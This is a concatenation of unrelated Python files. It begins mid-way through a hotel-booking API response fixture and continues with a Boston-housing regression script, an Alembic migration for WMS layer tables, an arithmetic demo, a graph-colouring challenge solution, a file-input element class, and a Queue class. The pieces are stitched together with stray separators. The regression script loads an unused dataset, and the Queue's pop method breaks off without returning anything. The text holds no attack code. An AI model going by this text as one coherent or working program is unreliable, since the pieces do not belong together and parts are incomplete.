"meal": "breakfast",
"payment_options": {
"payment_types": [
{
"amount": "3709.00",
"show_amount": "3709.00",
"currency_code": "RUB",
"show_currency_code": "RUB",
"by": "credit_card",
"is_need_credit_card_data": True,
"is_need_cvc": True,
"type": "now",
"tax_data": {
"taxes": [
{
"name": "vat",
"included_by_supplier": True,
"amount": "618.17",
"currency_code": "RUB",
}
]
},
"cancellation_penalties": {
"policies": [
{
"start_at": None,
"end_at": "2020-08-03T21:00:00",
"amount_charge": "0.00",
"amount_show": "0.00",
},
{
"start_at": "2020-08-03T21:00:00",
"end_at": None,
"amount_charge": "3709.00",
"amount_show": "3709.00",
},
],
"free_cancellation_before": "2020-08-03T21:00:00",
},
}
]
},
"rg_ext": {
"rg_class": 3,
"quality": 5,
"sex": 0,
"bathroom": 2,
"bedding": 3,
"family": 0,
"capacity": 2,
"club": 0,
},
"room_name": "Двухместный номер Superior (двуспальная кровать) (тип кровати может измениться)",
"serp_filters": ["has_bathroom"],
"sell_price_limits": None,
"allotment": 312,
"amenities_data": [
"double",
"non-smoking",
"private-bathroom",
"window",
],
"any_residency": False,
"deposit": None,
"no_show": {
"amount": "43.00",
"currency_code": "USD",
"from_time": "12:00:00",
},
"book_hash": "h-ddcdbbd6-0d69-5b0c-9590-297546579ed9",
},
{
"daily_prices": ["5001.00"],
"meal": "breakfast-buffet",
"payment_options": {
"payment_types": [
{
"amount": "5001.00",
"show_amount": "5001.00",
"currency_code": "RUB",
"show_currency_code": "RUB",
"by": "credit_card",
"is_need_credit_card_data": True,
"is_need_cvc": True,
"type": "now",
"tax_data": {
"taxes": [
{
"name": "vat",
"included_by_supplier": True,
"amount": "833.50",
"currency_code": "RUB",
}
]
},
"cancellation_penalties": {
"policies": [
{
"start_at": None,
"end_at": "2020-08-04T20:59:00",
"amount_charge": "0.00",
"amount_show": "0.00",
},
{
"start_at": "2020-08-04T20:59:00",
"end_at": None,
"amount_charge": "5001.00",
"amount_show": "5001.00",
},
],
"free_cancellation_before": "2020-08-04T20:59:00",
},
}
]
},
"rg_ext": {
"rg_class": 4,
"quality": 0,
"sex": 0,
"bathroom": 2,
"bedding": 3,
"family": 0,
"capacity": 2,
"club": 0,
},
"room_name": "Двухместный полулюкс (двуспальная кровать) (двуспальная кровать king size, тип кровати может измениться)",
"serp_filters": ["has_bathroom"],
"sell_price_limits": None,
"allotment": None,
"amenities_data": [
"double",
"non-smoking",
"private-bathroom",
"window",
],
"any_residency": True,
"deposit": None,
"no_show": None,
"book_hash": "h-45207eff-5ad3-5122-bff9-9c26b882b152",
},
{
"daily_prices": ["5001.00"],
"meal": "breakfast-buffet",
"payment_options": {
"payment_types": [
{
"amount": "5001.00",
"show_amount": "5001.00",
"currency_code": "RUB",
"show_currency_code": "RUB",
"by": "credit_card",
"is_need_credit_card_data": True,
"is_need_cvc": True,
"type": "now",
"tax_data": {
"taxes": [
{
"name": "vat",
"included_by_supplier": True,
"amount": "833.50",
"currency_code": "RUB",
}
]
},
"cancellation_penalties": {
"policies": [
{
"start_at": None,
"end_at": "2020-08-04T20:59:00",
"amount_charge": "0.00",
"amount_show": "0.00",
},
{
"start_at": "2020-08-04T20:59:00",
"end_at": None,
"amount_charge": "5001.00",
"amount_show": "5001.00",
},
],
"free_cancellation_before": "2020-08-04T20:59:00",
},
}
]
},
"rg_ext": {
"rg_class": 4,
"quality": 0,
"sex": 0,
"bathroom": 2,
"bedding": 4,
"family": 0,
"capacity": 2,
"club": 0,
},
"room_name": "Двухместный полулюкс (2 отдельные кровати) (тип кровати может измениться)",
"serp_filters": ["has_bathroom"],
"sell_price_limits": None,
"allotment": None,
"amenities_data": [
"non-smoking",
"private-bathroom",
"twin",
"window",
],
"any_residency": True,
"deposit": None,
"no_show": None,
"book_hash": "h-3fbe7ce0-19eb-5645-a1d4-da8121157c02",
},
{
"daily_prices": ["5808.00"],
"meal": "breakfast-buffet",
"payment_options": {
"payment_types": [
{
"amount": "5808.00",
"show_amount": "5808.00",
"currency_code": "RUB",
"show_currency_code": "RUB",
"by": "credit_card",
"is_need_credit_card_data": True,
"is_need_cvc": True,
"type": "now",
"tax_data": {
"taxes": [
{
"name": "vat",
"included_by_supplier": True,
"amount": "968.00",
"currency_code": "RUB",
}
]
},
"cancellation_penalties": {
"policies": [
{
"start_at": None,
"end_at": "2020-08-04T20:59:00",
"amount_charge": "0.00",
"amount_show": "0.00",
},
{
"start_at": "2020-08-04T20:59:00",
"end_at": None,
"amount_charge": "5808.00",
"amount_show": "5808.00",
},
],
"free_cancellation_before": "2020-08-04T20:59:00",
},
}
]
},
"rg_ext": {
"rg_class": 5,
"quality": 0,
"sex": 0,
"bathroom": 2,
"bedding": 3,
"family": 0,
"capacity": 2,
"club": 0,
},
"room_name": "Двухместный люкс (двуспальная кровать)",
"serp_filters": ["has_bathroom"],
"sell_price_limits": None,
"allotment": None,
"amenities_data": [
"double",
"non-smoking",
"private-bathroom",
"window",
],
"any_residency": True,
"deposit": None,
"no_show": None,
"book_hash": "h-eb6f8537-1b80-54d2-8a70-b8bfd8e8a9d1",
},
{
"daily_prices": ["91.68"],
"meal": "breakfast",
"payment_options": {
"payment_types": [
{
"amount": "6388.00",
"show_amount": "6388.00",
"currency_code": "RUB",
"show_currency_code": "RUB",
"by": "credit_card",
"is_need_credit_card_data": True,
"is_need_cvc": True,
"type": "now",
"tax_data": {
"taxes": [
{
"name": "vat",
"included_by_supplier": True,
"amount": "1064.67",
"currency_code": "RUB",
}
]
},
"cancellation_penalties": {
"policies": [
{
"start_at": None,
"end_at": "2020-08-03T21:00:00",
"amount_charge": "0.00",
"amount_show": "0.00",
},
{
"start_at": "2020-08-03T21:00:00",
"end_at": None,
"amount_charge": "6388.00",
"amount_show": "6388.00",
},
],
"free_cancellation_before": "2020-08-03T21:00:00",
},
}
]
},
"rg_ext": {
"rg_class": 4,
"quality": 0,
"sex": 0,
"bathroom": 2,
"bedding": 0,
"family": 0,
"capacity": 1,
"club": 0,
},
"room_name": "Одноместный полулюкс",
"serp_filters": ["has_bathroom"],
"sell_price_limits": None,
"allotment": 28,
"amenities_data": [
"non-smoking",
"private-bathroom",
"window",
],
"any_residency": False,
"deposit": None,
"no_show": {
"amount": "75.00",
"currency_code": "USD",
"from_time": "12:00:00",
},
"book_hash": "h-2fc30847-dd5c-50c6-9930-3eda4afcef74",
},
{
"daily_prices": ["106.47"],
"meal": "breakfast",
"payment_options": {
"payment_types": [
{
"amount": "7418.00",
"show_amount": "7418.00",
"currency_code": "RUB",
"show_currency_code": "RUB",
"by": "credit_card",
"is_need_credit_card_data": True,
"is_need_cvc": True,
"type": "now",
"tax_data": {
"taxes": [
{
"name": "vat",
"included_by_supplier": True,
"amount": "1236.33",
"currency_code": "RUB",
}
]
},
"cancellation_penalties": {
"policies": [
{
"start_at": None,
"end_at": "2020-08-03T21:00:00",
"amount_charge": "0.00",
"amount_show": "0.00",
},
{
"start_at": "2020-08-03T21:00:00",
"end_at": None,
"amount_charge": "7418.00",
"amount_show": "7418.00",
},
],
"free_cancellation_before": "2020-08-03T21:00:00",
},
}
]
},
"rg_ext": {
"rg_class": 3,
"quality": 2,
"sex": 0,
"bathroom": 2,
"bedding": 0,
"family": 0,
"capacity": 1,
"club": 0,
},
"room_name": "Одноместный номер Standard",
"serp_filters": ["has_bathroom"],
"sell_price_limits": None,
"allotment": 9,
"amenities_data": [
"non-smoking",
"private-bathroom",
"window",
],
"any_residency": False,
"deposit": None,
"no_show": {
"amount": "87.00",
"currency_code": "USD",
"from_time": "12:00:00",
},
"book_hash": "h-686c6d0c-ad5e-50be-966b-ed2713547a67",
},
{
"daily_prices": ["7421.00"],
"meal": "breakfast-buffet",
"payment_options": {
"payment_types": [
{
"amount": "7421.00",
"show_amount": "7421.00",
"currency_code": "RUB",
"show_currency_code": "RUB",
"by": "credit_card",
"is_need_credit_card_data": True,
"is_need_cvc": True,
"type": "now",
"tax_data": {
"taxes": [
{
"name": "vat",
"included_by_supplier": True,
"amount": "1236.83",
"currency_code": "RUB",
}
]
},
"cancellation_penalties": {
"policies": [
{
"start_at": None,
"end_at": "2020-08-04T20:59:00",
"amount_charge": "0.00",
"amount_show": "0.00",
},
{
"start_at": "2020-08-04T20:59:00",
"end_at": None,
"amount_charge": "7421.00",
"amount_show": "7421.00",
},
],
"free_cancellation_before": "2020-08-04T20:59:00",
},
}
]
},
"rg_ext": {
"rg_class": 5,
"quality": 5,
"sex": 0,
"bathroom": 2,
"bedding": 3,
"family": 0,
"capacity": 2,
"club": 0,
},
"room_name": "Двухместный люкс Superior (двуспальная кровать)",
"serp_filters": ["has_bathroom"],
"sell_price_limits": None,
"allotment": None,
"amenities_data": [
"double",
"non-smoking",
"private-bathroom",
"window",
],
"any_residency": True,
"deposit": None,
"no_show": None,
"book_hash": "h-5fb299f5-8afd-5718-97cb-1e2f000352bb",
},
{
"daily_prices": ["9034.00"],
"meal": "breakfast-buffet",
"payment_options": {
"payment_types": [
{
"amount": "9034.00",
"show_amount": "9034.00",
"currency_code": "RUB",
"show_currency_code": "RUB",
"by": "credit_card",
"is_need_credit_card_data": True,
"is_need_cvc": True,
"type": "now",
"tax_data": {
"taxes": [
{
"name": "vat",
"included_by_supplier": True,
"amount": "1505.67",
"currency_code": "RUB",
}
]
},
"cancellation_penalties": {
"policies": [
{
"start_at": None,
"end_at": "2020-08-04T20:59:00",
"amount_charge": "0.00",
"amount_show": "0.00",
},
{
"start_at": "2020-08-04T20:59:00",
"end_at": None,
"amount_charge": "9034.00",
"amount_show": "9034.00",
},
],
"free_cancellation_before": "2020-08-04T20:59:00",
},
}
]
},
"rg_ext": {
"rg_class": 6,
"quality": 0,
"sex": 0,
"bathroom": 2,
"bedding": 3,
"family": 0,
"capacity": 2,
"club": 0,
},
"room_name": "Двухместные апартаменты (двуспальная кровать) (1 комната)",
"serp_filters": ["has_bathroom"],
"sell_price_limits": None,
"allotment": None,
"amenities_data": [
"double",
"non-smoking",
"private-bathroom",
"window",
],
"any_residency": True,
"deposit": None,
"no_show": None,
"book_hash": "h-5bfa5429-4b87-5ffd-8a3c-57baec18f6fe",
},
{
"daily_prices": ["136.05"],
"meal": "breakfast",
"payment_options": {
"payment_types": [
{
"amount": "9479.00",
"show_amount": "9479.00",
"currency_code": "RUB",
"show_currency_code": "RUB",
"by": "credit_card",
"is_need_credit_card_data": True,
"is_need_cvc": True,
"type": "now",
"tax_data": {
"taxes": [
{
"name": "vat",
"included_by_supplier": True,
"amount": "1579.83",
"currency_code": "RUB",
}
]
},
"cancellation_penalties": {
"policies": [
{
"start_at": None,
"end_at": "2020-08-03T21:00:00",
"amount_charge": "0.00",
"amount_show": "0.00",
},
{
"start_at": "2020-08-03T21:00:00",
"end_at": None,
"amount_charge": "9479.00",
"amount_show": "9479.00",
},
],
"free_cancellation_before": "2020-08-03T21:00:00",
},
}
]
},
"rg_ext": {
"rg_class": 5,
"quality": 0,
"sex": 0,
"bathroom": 2,
"bedding": 0,
"family": 0,
"capacity": 1,
"club": 0,
},
"room_name": "Одноместный люкс",
"serp_filters": ["has_bathroom"],
"sell_price_limits": None,
"allotment": 2,
"amenities_data": [
"non-smoking",
"private-bathroom",
"window",
],
"any_residency": False,
"deposit": None,
"no_show": {
"amount": "112.00",
"currency_code": "USD",
"from_time": "12:00:00",
},
"book_hash": "h-1cbed9af-d3ab-5ed0-b6ad-dd397ed6d79f",
},
{
"daily_prices": ["150.85"],
"meal": "breakfast",
"payment_options": {
"payment_types": [
{
"amount": "10510.00",
"show_amount": "10510.00",
"currency_code": "RUB",
"show_currency_code": "RUB",
"by": "credit_card",
"is_need_credit_card_data": True,
"is_need_cvc": True,
"type": "now",
"tax_data": {
"taxes": [
{
"name": "vat",
"included_by_supplier": True,
"amount": "1751.67",
"currency_code": "RUB",
}
]
},
"cancellation_penalties": {
"policies": [
{
"start_at": None,
"end_at": "2020-08-03T21:00:00",
"amount_charge": "0.00",
"amount_show": "0.00",
},
{
"start_at": "2020-08-03T21:00:00",
"end_at": None,
"amount_charge": "10510.00",
"amount_show": "10510.00",
},
],
"free_cancellation_before": "2020-08-03T21:00:00",
},
}
]
},
"rg_ext": {
"rg_class": 3,
"quality": 5,
"sex": 0,
"bathroom": 2,
"bedding": 0,
"family": 0,
"capacity": 1,
"club": 0,
},
"room_name": "Одноместный номер Superior",
"serp_filters": ["has_bathroom"],
"sell_price_limits": None,
"allotment": 3,
"amenities_data": [
"non-smoking",
"private-bathroom",
"window",
],
"any_residency": False,
"deposit": None,
"no_show": {
"amount": "124.00",
"currency_code": "USD",
"from_time": "12:00:00",
},
"book_hash": "h-81bfa660-c8c3-52f4-895a-a2ceafc9fa72",
},
],
}
]
},
}
# ---- (stray "|" separator left by file extraction; kept as a comment so the text stays parseable) ----
# -*- coding: utf-8 -*-
"""
Created on Mon Jan 17 10:37:19 2022
@author: kawta

Fit ordinary least-squares, Ridge and Lasso regressions on the Boston
housing data and compare their test-set R^2 scores and coefficients.
"""
import pandas as pd
import numpy as np
import tensorflow as tf
import matplotlib.pyplot as plt
import seaborn as sns  # kept: imported by the original script (unused here)
from sklearn import datasets
from sklearn.model_selection import train_test_split
from sklearn.linear_model import LinearRegression, Ridge, Lasso
from sklearn.metrics import r2_score


def show_coefficients(model, columns):
    """Print the first 15 fitted coefficients and bar-plot all of them.

    :param model: a fitted sklearn linear model exposing ``coef_``
    :param columns: the predictor column names, aligned with ``coef_``
    """
    coef_df = pd.DataFrame()
    coef_df["Column_Name"] = columns
    coef_df["Coefficient_Value"] = pd.Series(model.coef_)
    print(coef_df.head(15))
    plt.rcParams["figure.figsize"] = (15, 6)
    plt.bar(coef_df["Column_Name"], coef_df["Coefficient_Value"])


# Load the Boston housing data into a DataFrame.
# NOTE(review): datasets.load_boston() was deprecated in scikit-learn 1.0 and
# removed in 1.2 — pin scikit-learn < 1.2 or migrate to another dataset
# (e.g. fetch_california_housing()) before upgrading.
boston_dataset = datasets.load_boston()
boston_df = pd.DataFrame(boston_dataset.data)
boston_df.columns = boston_dataset.feature_names
boston_df.head()

# BUG FIX: cifar10.load_data() returns ((x_train, y_train), (x_test, y_test))
# tuples of numpy arrays — there is no .data attribute, so the original
# `pd.DataFrame(cifar_dataset.data)` raised AttributeError. Unpack instead.
(cifar_x_train, cifar_y_train), (cifar_x_test, cifar_y_test) = \
    tf.keras.datasets.cifar10.load_data()

# Append the regression target (median house price) as the last column.
boston_npy_target_column = np.asarray(boston_dataset.target)
boston_df['House_Price'] = pd.Series(boston_npy_target_column)

# Separate predictors (all feature columns) from the response (last column).
predictors = boston_df.iloc[:, :-1]
response = boston_df.iloc[:, -1]
response.head()

# Hold out 20% of the rows as a test set.
X_train, X_test, Y_train, Y_test = train_test_split(predictors, response, test_size=0.2)
print(X_train.shape)
print(X_test.shape)

# --- Ordinary least squares -------------------------------------------------
linearreg = LinearRegression()
linearreg.fit(X_train, Y_train)
linearreg_prediction = linearreg.predict(X_test)
# BUG FIX: r2_score expects (y_true, y_pred); the original call had the
# arguments swapped, which silently produces a different (wrong) score.
R_squared = r2_score(Y_test, linearreg_prediction)
print("R squared error on test set : ", R_squared)
show_coefficients(linearreg, X_train.columns)

# --- Ridge regression (L2 penalty) ------------------------------------------
ridgeRegressor = Ridge(alpha=0.5)
ridgeRegressor.fit(X_train, Y_train)
y_predicted_ridge = ridgeRegressor.predict(X_test)
R_squared = r2_score(Y_test, y_predicted_ridge)
print("R squared error on test set : ", R_squared)
show_coefficients(ridgeRegressor, X_train.columns)

# Visual sanity check: house price against the LSTAT feature.
plt.scatter(boston_df['LSTAT'], boston_df['House_Price'])

# --- Lasso regression (L1 penalty) ------------------------------------------
LassoRegressor = Lasso(alpha=1)
LassoRegressor.fit(X_train, Y_train)
y_predicted_lasso = LassoRegressor.predict(X_test)
R_squared = r2_score(Y_test, y_predicted_lasso)
print("R squared error on test set : ", R_squared)
show_coefficients(LassoRegressor, X_train.columns)
|
# -*- coding: utf-8 -*-
# Copyright (c) 2015-2019, Camptocamp SA
# All rights reserved.
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are met:
# 1. Redistributions of source code must retain the above copyright notice, this
# list of conditions and the following disclaimer.
# 2. Redistributions in binary form must reproduce the above copyright notice,
# this list of conditions and the following disclaimer in the documentation
# and/or other materials provided with the distribution.
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND
# ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED
# WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
# DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR CONTRIBUTORS BE LIABLE FOR
# ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES
# (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
# LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND
# ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS
# SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
# The views and conclusions contained in the software and documentation are those
# of the authors and should not be interpreted as representing official policies,
# either expressed or implied, of the FreeBSD Project.
"""internal and external layer tables refactoring, new ogc table
Revision ID: 116b9b79fc4d
Revises: 1418cb05921b
Create Date: 2015-10-28 12:21:59.162238
"""
from alembic import op
from sqlalchemy import ForeignKey, Column
from sqlalchemy.types import Integer, Boolean, Unicode
from c2c.template.config import config
# revision identifiers, used by Alembic.
revision = '116b9b79fc4d'
# NOTE(review): the module docstring above says "Revises: 1418cb05921b", but
# down_revision points at 'a4f1aac9bda' — confirm which one is correct before
# relying on the docstring.
down_revision = 'a4f1aac9bda'
branch_labels = None
depends_on = None
def upgrade():
    """Create the new server_ogc and layer_wms tables, migrate every row of
    layer_internal_wms / layer_external_wms into them, drop the old tables,
    and retype the affected treeitem rows to 'l_wms'.
    """
    schema = config['schema']
    # Instructions
    op.create_table(
        'server_ogc',
        Column('id', Integer, primary_key=True),
        Column('name', Unicode, nullable=False),
        Column('description', Unicode),
        Column('url', Unicode),
        # url_wfs needed for Arcgis because wms and wfs url may be different
        Column('url_wfs', Unicode),
        Column('type', Unicode),
        Column('image_type', Unicode),
        Column('auth', Unicode),
        Column('wfs_support', Boolean, server_default='false'),
        Column('is_single_tile', Boolean, server_default='false'),
        schema=schema,
    )
    op.create_table(
        'layer_wms',
        Column(
            'id', Integer,
            ForeignKey(schema + '.layer.id'), primary_key=True
        ),
        Column(
            'server_ogc_id', Integer,
            ForeignKey(schema + '.server_ogc.id')
        ),
        Column('layer', Unicode),
        Column('style', Unicode),
        Column('time_mode', Unicode, server_default='disabled', nullable=False),
        Column('time_widget', Unicode, server_default='slider', nullable=False),
        schema=schema,
    )
    # move data from layer_internal_wms and layer_external_wms to the new
    # layer_wms and server_ogc tables
    # ocg for internal
    # default 'image/jpeg', 'image/png'
    op.execute(
        'INSERT INTO %(schema)s.server_ogc (name, description, type, image_type, '
        " auth, wfs_support) "
        "SELECT 'source for ' || image_type AS name, "
        " 'default source for internal ' || image_type AS description, "
        " 'mapserver' AS type, "
        " image_type, "
        " 'Standard auth' AS auth, "
        " 'true' AS wfs_support "
        "FROM ("
        " SELECT UNNEST(ARRAY['image/jpeg', 'image/png']) AS image_type"
        ") AS foo" % {
            'schema': schema,
        }
    )
    # other custom image types
    op.execute(
        'INSERT INTO %(schema)s.server_ogc (name, description, type, image_type, '
        " auth, wfs_support) "
        "SELECT 'source for ' || image_type AS name, "
        " 'default source for internal ' || image_type AS description, "
        " 'mapserver' AS type, "
        " image_type, "
        " 'Standard auth' AS auth, "
        " 'true' AS wfs_support "
        "FROM ("
        " SELECT DISTINCT(image_type) FROM %(schema)s.layer_internal_wms "
        " WHERE image_type NOT IN ('image/jpeg', 'image/png')"
        ") as foo" % {
            'schema': schema,
        }
    )
    # layers for internal
    # internal with not null image_type
    # Join each internal layer to the server_ogc row created for its
    # image_type above.
    op.execute(
        'INSERT INTO %(schema)s.layer_wms (id, server_ogc_id, layer, style, '
        ' time_mode, time_widget) '
        'SELECT lew.id, so.id, layer, style, time_mode, time_widget '
        'FROM %(schema)s.layer_internal_wms AS lew, %(schema)s.server_ogc AS so '
        'WHERE lew.image_type=so.image_type AND so.type IS NOT NULL' % {
            'schema': schema,
        }
    )
    # internal with null image_type
    # Layers without an explicit image_type fall back to the 'image/png'
    # server created above.
    op.execute(
        'INSERT INTO %(schema)s.layer_wms (id, server_ogc_id, layer, style, '
        ' time_mode, time_widget) '
        'SELECT lew.id, so.id, layer, style, time_mode, time_widget '
        'FROM %(schema)s.layer_internal_wms AS lew, %(schema)s.server_ogc AS so '
        "WHERE lew.image_type IS NULL AND so.image_type='image/png'" % {
            'schema': schema,
        }
    )
    # ocg for externals
    # One server_ogc row per distinct (url, image_type, is_single_tile) combo.
    op.execute(
        'INSERT INTO %(schema)s.server_ogc (name, url, type, image_type, auth, is_single_tile) '
        "SELECT 'source for ' || url, url, 'mapserver' AS type, image_type, 'none', CASE "
        'WHEN is_single_tile IS TRUE THEN TRUE ELSE FALSE END as is_single_tile '
        'FROM %(schema)s.layer_external_wms GROUP BY url, image_type, is_single_tile' % {
            'schema': schema,
        }
    )
    # layers for external
    op.execute(
        'INSERT INTO %(schema)s.layer_wms (id, server_ogc_id, layer, style, '
        ' time_mode, time_widget) '
        'SELECT lew.id, so.id, layer, style, time_mode, time_widget '
        'FROM %(schema)s.layer_external_wms as lew, %(schema)s.server_ogc as so '
        'WHERE lew.url=so.url AND lew.is_single_tile=so.is_single_tile '
        'AND lew.image_type=so.image_type' % {
            'schema': schema,
        }
    )
    # All rows migrated above; the old tables can now be dropped.
    op.drop_table('layer_external_wms', schema=schema)
    op.drop_table('layer_internal_wms', schema=schema)
    # update layer type in treeitems
    op.execute(
        'UPDATE %(schema)s.treeitem '
        "SET type='l_wms' "
        "WHERE type='l_int_wms' OR type='l_ext_wms'" % {
            'schema': schema,
        }
    )
def downgrade():
    """Recreate layer_internal_wms / layer_external_wms, move the rows back
    out of layer_wms (split on whether server_ogc.type is NULL), drop the
    merged tables, and restore the treeitem type discriminators.
    """
    schema = config['schema']
    # Instructions
    # recreate tables 'layer_internal_wms' and 'layer_external_wms'
    op.create_table(
        'layer_internal_wms',
        Column(
            'id', Integer, ForeignKey(schema + '.layer.id'), primary_key=True
        ),
        Column('layer', Unicode),
        Column('image_type', Unicode(10)),
        Column('style', Unicode),
        Column('time_mode', Unicode(8)),
        Column('time_widget', Unicode(10), server_default='slider'),
        schema=schema,
    )
    op.create_table(
        'layer_external_wms',
        Column(
            'id', Integer, ForeignKey(schema + '.layer.id'), primary_key=True
        ),
        Column('url', Unicode),
        Column('layer', Unicode),
        Column('image_type', Unicode(10)),
        Column('style', Unicode),
        Column('is_single_tile', Boolean),
        Column('time_mode', Unicode(8)),
        Column('time_widget', Unicode(10), server_default='slider'),
        schema=schema,
    )
    # move data back
    # internal (type is not null)
    op.execute(
        'INSERT INTO %(schema)s.layer_internal_wms (id, layer, image_type, style, '
        ' time_mode, time_widget) '
        'SELECT w.id, layer, image_type, style, time_mode, time_widget '
        'FROM %(schema)s.layer_wms AS w, %(schema)s.server_ogc AS o '
        'WHERE w.server_ogc_id=o.id AND o.type IS NOT NULL' % {
            'schema': schema,
        }
    )
    # external (type is null)
    op.execute(
        'INSERT INTO %(schema)s.layer_external_wms (id, url, layer, image_type, style, '
        ' is_single_tile, time_mode, time_widget) '
        'SELECT w.id, url, layer, image_type, style, is_single_tile, time_mode, time_widget '
        'FROM %(schema)s.layer_wms AS w, %(schema)s.server_ogc AS o '
        'WHERE w.server_ogc_id=o.id AND o.type IS NULL' % {
            'schema': schema,
        }
    )
    # drop table AFTER moving data back
    op.drop_table('layer_wms', schema=schema)
    op.drop_table('server_ogc', schema=schema)
    # update layer type in treeitems
    # internal
    op.execute(
        "UPDATE %(schema)s.treeitem "
        "SET type='l_int_wms' "
        "FROM %(schema)s.layer_internal_wms as w "
        "WHERE %(schema)s.treeitem.id=w.id" % {
            'schema': schema,
        }
    )
    # external
    op.execute(
        "UPDATE %(schema)s.treeitem "
        "SET type='l_ext_wms' "
        "FROM %(schema)s.layer_external_wms as w "
        "WHERE %(schema)s.treeitem.id=w.id" % {
            'schema': schema,
        }
    )
|
# Demonstrate Python's arithmetic operators on two sample integers.
x = 40
y = 30
print(f'x + y = {x + y}')    # 70
print(f'x - y = {x - y}')    # 10
print(f'x * y = {x * y}')    # 1200
print(f'x / y = {x / y}')    # 1.333... (true division always yields a float)
print(f'x // y = {x // y}')  # 1 => floor division (quotient)
print(f'x % y = {x % y}')    # 10 (remainder)
# 1152921504606846976000000000000000000000000000000 => x ^ y
print(f'x ** y = {x ** y}')
|
"""
[12/23/13] Challenge #130 [Hard] Coloring France's Departments
https://www.reddit.com/r/dailyprogrammer/comments/1tj0kl/122313_challenge_130_hard_coloring_frances/
# [](#HardIcon) *(Hard)*: Coloring France's Departments
The European country of [France](http://en.wikipedia.org/wiki/France) is segmented into many different
[departments](http://en.wikipedia.org/wiki/Departments_of_France); 96 in the main continent with a few others overseas.
Wikipedia, as always, has a great [visualization of these departments with their respective unique numbers
here](http://upload.wikimedia.org/wikipedia/commons/b/b2/D%C3%A9partements_de_France_English.svg).
Some departments, like 66 (Pyrénées-Orientales), are only bordered by two other departments. Others, like department
87, are surrounded by much more (6 in this example). Your goal is to color a map of these regions with two
requirements: 1) make sure that each adjacent department do not share a color, so you can clearly distinguish each
department, and 2) minimize these numbers of colors.
The input will be a variation of the list of French departments, represented as an [adjacency
list](http://en.wikipedia.org/wiki/Adjacency_list). This challenge is essentially solving for [Graph
coloring](http://en.wikipedia.org/wiki/Graph_coloring), where you must print each department's color (a unique integer).
# Formal Inputs & Outputs
## Input Description
On standard console input, you will be given an integer N which represents the following N-lines of an adjacency list.
These lines of data will always be in the format of integers A B C D ... where A is the source node / vertex that
points to vertices B C D... etc. Remember that this data really means that A is the ID of a department, and B C D ...
are the bordering departments.
Writing up the French department list as an adjacency list is very tedious; feel free to only work on a subset.
## Output Description
For each given node (a department), print the unique color identifier after it. A color identifier is a unique integer,
starting from 0, that represents a unique color. Remember that bordering departments (i.e. adjacent nodes) cannot have
the same color index!
# Sample Inputs & Outputs
## Sample Input
*Note that this list only contains 8 departments from the south-western corner of France as an example*
8
64 40 32 65
65 64 32 31
31 65 32 82 81 11 9
9 31 11 66
66 9 11
40 33 47 32 64
32 40 47 82 31 65 64
11 31 81 34 66 9
## Sample Output
64 0
65 1
31 0
9 1
66 0
40 1
32 2
11 2
# Challenge++:
If you want to go above and beyond for this challenge, programmatically draw a map of the French departments with
actual colors from your unique set (you may randomly pick them or use a [color
palette](http://en.wikipedia.org/wiki/Palette_(computing\))). Feel free to use the linked SVG file from Wikipedia,
since it can be modified through text / XML manipulation.
"""
def color_graph(adjacency):
    """Greedily color a graph given as ``[(node, [neighbours...]), ...]``.

    Nodes are processed in input order; each receives the smallest
    non-negative integer not already used by an adjacent, already-colored
    node. This matches the challenge's sample output.

    :param adjacency: list of (node, neighbour-list) pairs
    :return: dict mapping node -> color index (int, starting at 0)
    """
    colors = {}
    for node, neighbours in adjacency:
        # Colors already taken by colored neighbours of this node.
        taken = {colors[n] for n in neighbours if n in colors}
        color = 0
        while color in taken:
            color += 1
        colors[node] = color
    return colors


def main():
    """Read the adjacency list from stdin and print 'node color' per line.

    Input format: first line is N, followed by N lines of 'A B C D ...'
    where A is a department id and B C D ... its bordering departments.
    """
    import sys
    lines = sys.stdin.read().splitlines()
    count = int(lines[0])
    adjacency = []
    for line in lines[1:count + 1]:
        parts = line.split()
        adjacency.append((parts[0], parts[1:]))
    colors = color_graph(adjacency)
    for node, _ in adjacency:
        print(node, colors[node])


if __name__ == "__main__":
    main()
|
from errno import ENOENT
from os import path
import six
from .html_elements import InputCollection
from .input import Input
from ..meta_elements import MetaHTMLElement
@six.add_metaclass(MetaHTMLElement)
class FileField(Input):
    def set(self, filepath):
        """
        Sets the file field to the given path.

        :param filepath: path to the file
        :raises OSError: with errno ENOENT when the path does not exist
        """
        if path.exists(filepath):
            self.value = filepath
        else:
            raise OSError(ENOENT, '{!r} does not exist.'.format(filepath))

    @property
    def value(self):
        """
        Gets the value of the file field.

        :rtype: str
        """
        return self.attribute_value('value')

    @value.setter
    def value(self, filepath):
        """
        Types the given path into the file field element.

        :param filepath: path to the file
        """
        self._element_call(lambda: self.el.send_keys(filepath))
@six.add_metaclass(MetaHTMLElement)
class FileFieldCollection(InputCollection):
    # Collection counterpart of FileField; all behavior is inherited from
    # InputCollection unchanged.
    pass
|
from LinkedList import *
from collections import *
class Queue:
    """A FIFO queue backed by a Python list.

    Items are inserted at index 0 and dequeued from the end of the list,
    so the *front* of the queue is the last list element.
    """

    def __init__(self):
        """Initialize an empty queue."""
        self.queue = list()

    def enqueue(self, item):
        """Add ``item`` to the back of the queue.

        :raises ValueError: if ``item`` is None (preserves the original
            contract of rejecting None entries; ValueError is a subclass of
            the bare Exception the original raised).
        """
        if item is None:
            raise ValueError("Cannot enqueue None")
        self.queue.insert(0, item)

    def getSize(self):
        """Return the number of items currently in the queue."""
        return len(self.queue)

    def queuePop(self):
        """Remove and return the front item of the queue.

        :raises IndexError: if the queue is empty. (The original
            ``raise "No elements in queue"`` raised a plain string, which is
            itself a TypeError in Python 3.)
        """
        if not self.queue:
            raise IndexError("No elements in queue")
